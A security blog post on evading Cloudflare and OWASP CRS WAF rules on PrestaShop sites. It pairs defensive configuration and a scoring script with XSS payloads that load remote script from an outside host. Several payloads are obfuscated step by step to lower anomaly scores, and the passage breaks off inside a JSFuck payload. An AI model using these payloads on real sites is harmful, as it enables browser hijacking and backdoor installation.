Cloudflare PrestaShop: WAFs' little secrets, or "WAF Fooling"


Last update on 13/02/2026 by Vincent G.


This translation was produced with the assistance of ChatGPT from the original French version. Some parts were removed as they were considered irrelevant to the Anglo-Saxon ecosystem.



1. How does Cloudflare's WAF work and, by extension, OWASP CRS?



For the rest of this article, we assume you have already read our other posts and therefore know what a WAF is and what it is used for.

Cloudflare is a good tool that offers a WAF starting with its plan at €240 excl. VAT per year (the free plan only ships a minimal managed ruleset, not the OWASP one).

However, at that entry price point, the level of protection remains very limited and is often ineffective. Only the €2,400 excl. VAT per year plan provides professional-grade protection, and only provided that the configuration, which you must do manually, has been implemented correctly, which is far from always the case.

We'll see why in this article. This is not a critique of Cloudflare as a solution, but rather a questioning of flawed OWASP CRS‑based WAF configurations (including Cloudflare's) deployed by unscrupulous third parties.



To understand how Cloudflare's WAF works, it is essential to understand what a large part of it is built on: OWASP CRS (Core Rule Set), one of the best open-source WAF rule sets available today, which Cloudflare ships as one of its managed rulesets alongside its own.

So the goal here is not to explain Cloudflare's internals, but to understand how OWASP CRS works, since it is the part of the WAF whose behaviour (paranoia level and anomaly threshold) you have to configure yourself.

OWASP CRS provides more than 300 security rules designed by some of the world's best application-security specialists, grouped into four so-called paranoia levels (PL1 to PL4). Each level adds stricter rules on top of the previous one, so PL2 evaluates every PL1 rule plus its own, at the cost of more false positives.

Every request sent to PrestaShop, for example via a contact form, a signup, or a login, is analyzed against all the rules up to the configured paranoia level.

When a rule detects a sequence considered abnormal or suspicious, it does not block by itself: it adds points to the request's anomaly score.

The number of points depends on the rule's severity: 5 for CRITICAL, 4 for ERROR, 3 for WARNING and 2 for NOTICE. Most attack-detection rules are CRITICAL, which is why the scores in this article are mostly multiples of 5.

During an attack, a single request often triggers multiple rules, and a rule that appears twice in the matched list has matched twice and is counted twice; each match increases the request's overall score.

At the end of the request phase, the total is compared with a blocking threshold. The job of the DevSecOps (application security specialist) responsible for your project's security is therefore to constantly arbitrate between the score generated by the rules and the threshold at which the request must be blocked.

While keeping in mind that no security rule exists without, at some point, generating unwanted blockings, also known as false positives.
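As an added example (not configuration from the article, from Cloudflare or from the CRS project), here is what those two knobs, and the right way to handle a false positive, look like in a self-hosted ModSecurity deployment of CRS 4. The first, commented-out SecAction shows the weak threshold; the two after it carry the recommended values. The exclusion at the end assumes a hypothetical PrestaShop back-office path and parameter name, and is the alternative to disabling an HTML-detection rule such as 941160 for the whole shop.

```apache
# crs-setup.conf (excerpt). Added example: variable names are those of CRS 4
# (tx.blocking_paranoia_level, tx.inbound_anomaly_score_threshold).

# WEAK (left commented out): a threshold such as 40 waves through every
# payload in this article, whose PL2 scores range from 10 to 38.
# SecAction "id:900110,phase:1,pass,t:none,nolog,setvar:tx.inbound_anomaly_score_threshold=40"

# RECOMMENDED: evaluate the PL2 rules on top of PL1 ...
SecAction \
  "id:900000,\
  phase:1,\
  pass,\
  t:none,\
  nolog,\
  setvar:tx.blocking_paranoia_level=2"

# ... and block as soon as a single CRITICAL rule (5 points) fires.
SecAction \
  "id:900110,\
  phase:1,\
  pass,\
  t:none,\
  nolog,\
  setvar:tx.inbound_anomaly_score_threshold=5,\
  setvar:tx.outbound_anomaly_score_threshold=4"

# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf (excerpt).
# A product-description form legitimately carries HTML. Rather than disabling
# 941160 for the whole shop, drop it only for that parameter on that endpoint.
# /admin-dev/ and description_short are hypothetical: adapt them to the real
# (renamed) back-office path and field.
SecRule REQUEST_URI "@beginsWith /admin-dev/index.php" \
  "id:1001,\
  phase:1,\
  pass,\
  t:none,\
  nolog,\
  ctl:ruleRemoveTargetById=941160;ARGS:description_short,\
  ctl:ruleRemoveTargetById=941320;ARGS:description_short"
```

The exclusion removes the two rules for one named argument on one URL prefix; every other parameter of that request, and every other endpoint, is still scored normally, which is what "whitelisting page by page" means in practice.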


2. What is WAF Fooling, or how to craft low-fingerprint offensive payloads?



OWASP CRS's official recommendation is to block a request as soon as its anomaly score reaches 5, the default threshold, which means that a single CRITICAL rule, or a combination of lesser rules, has been triggered.

More and more criminal networks have fully understood that many players do not comply with this recommendation. Notably those using Cloudflare, whose OWASP managed ruleset exposes the threshold as three presets, Low, Medium and High, that block at 60, 40 and 25 points respectively: far above the 5 points CRS assumes.

A defensive protocol isn't a skills exam where a score of 10/20 is "good enough": it's a dam, and the slightest crack is enough to cause a total collapse. Recent incidents have reminded us of that, collectively.

In application security, rigor isn't optional; it's the bare minimum condition if you hope to contain offensive payloads designed specifically to stay under the radar.

Those same networks have specialized in bypassing WAFs by crafting payloads with the lowest possible anomaly score (low fingerprint payloads). This practice is known as WAF fooling or


How to fool a WAF that isn't properly configured


The offensive payloads shown below - rated from high to critical severity - are published for strictly educational purposes, to help third parties understand how professional criminal networks manage to compromise systems despite the presence of cyber-defense tools sold by unscrupulous providers, such as improperly configured Cloudflare WAFs.

Any use of these payloads outside a legal framework and without explicit authorization is a criminal offense and exposes the perpetrator to legal prosecution.

Let's analyze this in detail by looking at a few common vulnerability classes in our ecosystems: XSS, SQL, PHP, RCE, path traversal, and XXE injections.



2.1/ XSS injections



Let's dive straight in with XSS - in other words, how to remotely take control of the web browsers of PrestaShop site administrators or their customers.

Let's take as an example this category-1 XSS injection (CWE-79; "category 1" is the CRS XSS filter category for script-tag vectors, rule 941110), which loads a script that automatically installs a PrestaShop module containing a disarmed backdoor:

?cnmq=<script src='https://1j.vc/ps_a.js' />

Variants are available for WordPress here: https://1j.vc/wp_a.js / https://1j.vc/wp_b.js

OWASP CRS provides a tool for measuring the score of attack sequences: http://sandbox.coreruleset.org/

Let's test our payload against a WAF configured at paranoia level 1, also known as PL1:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=<script src='https://1j.vc/ps_a.js' />"
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)


Please note the payload's score: 15, which corresponds to three critical rules being triggered.

Meaning: if your WAF doesn't block requests with scores of 15 or higher, this payload will get through without any difficulty.

Here's the same example, but with a WAF configured at paranoia level 2, also known as PL2, which also evaluates the full set of PL1 rules:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=<script src='https://1j.vc/ps_a.js' />"
931130 PL2 Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL2 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 35)


Please note the payload's score: 35, which corresponds to seven critical rules being triggered. In other words: if your WAF doesn't block requests with scores of 35 or higher, this payload will get through without any difficulty.

Based on these two tests, you should easily understand why it is strongly recommended to work with a paranoia level of 2: in this example the payload triggers seven rules instead of three, and its score more than doubles.

However, these payloads are still junior-level; there are many variants that can achieve the same result.

For example, here's this category-2 XSS variant (CRS "Category 2: Event Handler Vector", rule 941120, which is only evaluated from PL2 upwards), functionally identical in a context using jQuery, which is the case for virtually all e-commerce sites:

?cnmq=<img src=- onerror="$.getScript('//1j.vc/ps_a.js')" />

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d 'cnmq=<img src=- onerror="$.getScript(%27//1j.vc/ps_a.js%27)" />'
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)


Please note the payload's score: 10, which corresponds to only two critical rules being triggered. In other words: if your WAF doesn't block requests with scores of 10 or higher, this payload will get through without any difficulty.

Those of you who program in JavaScript have probably noticed that it isn't entirely honest to test this payload as-is. jQuery is very often loaded deferred or asynchronously today; in that case the $ variable hasn't been defined yet when the browser fires the inline onerror handler during parsing, and the call simply throws.

Here is an adjusted payload, more representative of the threat against jQuery :

?cnmq=<img src=- onerror="setTimeout(() => {$.getScript('//1j.vc')},2000)" />

This time, we'll submit it directly at paranoia level 2 :

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=%3Cimg%20src%3D-%20onerror%3D%22setTimeout%28%28%29%20%3D%3E%20%7B%24.getScript%28%27%2F%2F1j.vc%27%29%7D%2C2000%29%22%20%2F%3E'
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941390 PL1 Javascript method detected
941120 PL2 XSS Filter - Category 2: Event Handler Vector
941150 PL2 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 58)


The payload's initial score comes to 58 points. We'll therefore make several adjustments to reduce the number of rules being triggered.

?cnmq=<img src=- onerror="setTimeout(() => {$.getScript(atob(String(/Ly8xai52Yw/).slice(1,-1)))},1000);" a />

To reduce its fingerprint, we crafted the payload so that some security rules no longer match: the URL is no longer a quoted string literal but a base64 value carried inside a regex literal; String(/Ly8xai52Yw/).slice(1,-1) strips the surrounding slashes and atob() decodes it back to //1j.vc. Let's look at the score at paranoia level 2:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=%3Cimg%20src%3D-%20onerror%3D%22setTimeout%28%28%29%20%3D%3E%20%7B%24.getScript%28atob%28String%28%2FLy8xai52Yw%2F%29.slice%281%2C-1%29%29%29%7D%2C1000%29%3B%22%20a%20%2F%3E'
932281 PL2 Remote Command Execution: Brace Expansion Found
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941390 PL1 Javascript method detected
941120 PL2 XSS Filter - Category 2: Event Handler Vector
941150 PL2 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 38)


The score was reduced by 20 points, dropping from 58 to 38.

However, there's a little secret about WAFs: rules 941160, 941320, and 942430 are very difficult to keep enabled in production. They effectively prohibit sending HTML sequences - yet those are common in e-commerce contexts - and they require you to exhaustively whitelist every page that must allow this kind of content, a constraint that non-professional integrators almost never accept.

In practice, many deployments therefore disable these three rules outright. Taking that reality into account, the score drops from 38 to 25, not 23: 941160 and 941320 are CRITICAL rules worth 5 points each, but 942430 is a WARNING-level rule worth only 3 (which is also why the totals above are not all multiples of 5).

The score actually observed in practice for this payload is therefore around 25 points. And the attacker does not even need to inject an <img> tag: here is a (much more realistic) category-2 variant that assumes the input is reflected inside an existing attribute value and simply breaks out of it with a quote. It scores 28 with every rule enabled, and 20 once 941160 and 942430 are switched off:

?cnmq=" onerror="setTimeout(() => {$.getScript(atob(String(/Ly8xai52Yw/).slice(1,-1)))},1000);" "

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=%22%20onerror%3D%22setTimeout%28%28%29%20%3D%3E%20%7B%24.getScript%28atob%28String%28%2FLy8xai52Yw%2F%29.slice%281%2C-1%29%29%29%7D%2C1000%29%3B%22%20%22"
932281 PL2 Remote Command Execution: Brace Expansion Found
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941390 PL1 Javascript method detected
941120 PL2 XSS Filter - Category 2: Event Handler Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 28)
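To check this arithmetic without re-running the sandbox, here is an added example (not the article's code): it parses the sandbox's txt-matched-rules output, scores each match with the CRS severity points (CRITICAL 5, ERROR 4, WARNING 3, NOTICE 2), and shows what is left once 941160, 941320 and 942430 are disabled. The severity table only covers the rule IDs that appear on this page, the two sample outputs are the sandbox results quoted above, embedded inline so the script runs offline, and the Cloudflare threshold presets it compares against are an assumption to check against Cloudflare's documentation.

```python
# Added example, not code from the original article: recompute CRS anomaly
# scores from the sandbox's "txt-matched-rules" output and simulate what is
# left once an operator disables some rules.
import re

# CRS anomaly points per severity (crs-setup.conf defaults).
SEVERITY_POINTS = {"CRITICAL": 5, "ERROR": 4, "WARNING": 3, "NOTICE": 2}

# Severity of every rule seen in the article's sandbox runs. All are CRITICAL
# except 942430, a WARNING-level rule worth 3 points, which is why the totals
# (58, 38, 28) are not multiples of 5.
RULE_SEVERITY = {
    "931130": "CRITICAL", "932200": "CRITICAL", "932281": "CRITICAL",
    "941100": "CRITICAL", "941110": "CRITICAL", "941120": "CRITICAL",
    "941150": "CRITICAL", "941160": "CRITICAL", "941320": "CRITICAL",
    "941390": "CRITICAL", "942200": "CRITICAL", "942370": "CRITICAL",
    "942430": "WARNING", "942520": "CRITICAL",
}

# Thresholds to compare against. 5 is the CRS default; the three Cloudflare
# values are the High/Medium/Low presets of its OWASP managed ruleset
# (assumption: verify against the current Cloudflare documentation).
THRESHOLDS = {"crs_default": 5, "cloudflare_high": 25,
              "cloudflare_medium": 40, "cloudflare_low": 60}

_RULE_LINE = re.compile(r"^(\d{6}) PL(\d|\?) (.+)$")
_TOTAL_LINE = re.compile(r"Total Score: (\d+)")


def parse_matched_rules(text):
    """Rule IDs from the sandbox output, one entry per match line.

    A rule listed twice (932200 below) matched twice and scores twice, as CRS
    counts it. 949110 is the blocking-evaluation rule, not a detection, so it
    is skipped.
    """
    ids = []
    for line in text.strip().splitlines():
        m = _RULE_LINE.match(line.strip())
        if m and m.group(1) != "949110":
            ids.append(m.group(1))
    return ids


def reported_total(text):
    """The total the sandbox itself printed, used as a cross-check."""
    m = _TOTAL_LINE.search(text)
    return int(m.group(1)) if m else None


def anomaly_score(rule_ids, disabled=()):
    """Sum severity points, ignoring rules the operator has disabled."""
    disabled = set(disabled)
    return sum(SEVERITY_POINTS[RULE_SEVERITY[r]]
               for r in rule_ids if r not in disabled)


def verdicts(score):
    """Which thresholds would block a request carrying this score."""
    return {name: score >= t for name, t in THRESHOLDS.items()}


# Sandbox output for the 2-second setTimeout payload at PL2 (58 points).
PL2_SETTIMEOUT = """
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941390 PL1 Javascript method detected
941120 PL2 XSS Filter - Category 2: Event Handler Vector
941150 PL2 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 58)
"""

# Same payload after the atob()/String(/regex/) rewrite (38 points).
PL2_ATOB = """
932281 PL2 Remote Command Execution: Brace Expansion Found
941100 PL1 XSS Attack Detected via libinjection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941390 PL1 Javascript method detected
941120 PL2 XSS Filter - Category 2: Event Handler Vector
941150 PL2 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 38)
"""

# Rules the article says are commonly switched off in e-commerce deployments.
COMMONLY_DISABLED = {"941160", "941320", "942430"}

if __name__ == "__main__":
    for label, out in (("setTimeout", PL2_SETTIMEOUT), ("atob", PL2_ATOB)):
        ids = parse_matched_rules(out)
        full, residual = anomaly_score(ids), anomaly_score(ids, COMMONLY_DISABLED)
        print(f"{label}: {full} pts (sandbox: {reported_total(out)}), "
              f"{residual} pts once {sorted(COMMONLY_DISABLED)} are disabled; "
              f"blocked by {[k for k, v in verdicts(residual).items() if v]}")
```

Run it and the atob payload lands at 25 points with the three rules disabled: still blocked by the CRS default of 5 and by a 25-point threshold, but invisible to a WAF set at 40 or 60. Paste the 28-point output of the attribute-breakout variant into a third string and the same functions give 20.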


Or, alternatively, its JSFuck-obfuscated variant (https://jsfuck.com/):

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=%22%20onerror%3D%22%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2
B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%
5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%28%29%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B
%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B